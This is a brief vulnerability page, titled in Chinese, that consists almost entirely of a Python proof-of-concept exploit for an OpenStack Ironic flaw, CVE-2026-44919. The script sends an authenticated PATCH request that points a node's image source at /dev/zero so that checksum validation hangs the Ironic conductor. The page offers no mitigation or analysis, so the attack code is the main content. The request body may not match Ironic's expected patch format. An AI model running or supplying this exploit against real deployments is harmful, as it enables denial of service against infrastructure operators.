OpenStack Ironic 校验和计算无限循环漏洞

# Conceptual Proof of Concept for CVE-2026-44919 # This demonstrates how a malicious image URL could trigger the infinite loop. import requests # Target Ironic API endpoint ironic_api_url = "http://target-ironic-api:6385/v1/nodes" node_id = "<TARGET_NODE_UUID>" auth_token = "<VALID_AUTH_TOKEN>" # Malicious configuration pointing to /dev/zero # This causes the checksum calculation to loop infinitely. payload = { "instance_info": { "image_source": "file:///dev/zero", "image_checksum": "http://example.com/fake_checksum" } } headers = { "Content-Type": "application/json", "X-Auth-Token": auth_token } try: # Send request to update node with malicious image URL response = requests.patch( f"{ironic_api_url}/{node_id}", json=payload, headers=headers ) print(f"Request sent with status code: {response.status_code}") print("If successful, the Ironic conductor will enter an infinite loop during checksum validation.") except Exception as e: print(f"Error occurred: {e}")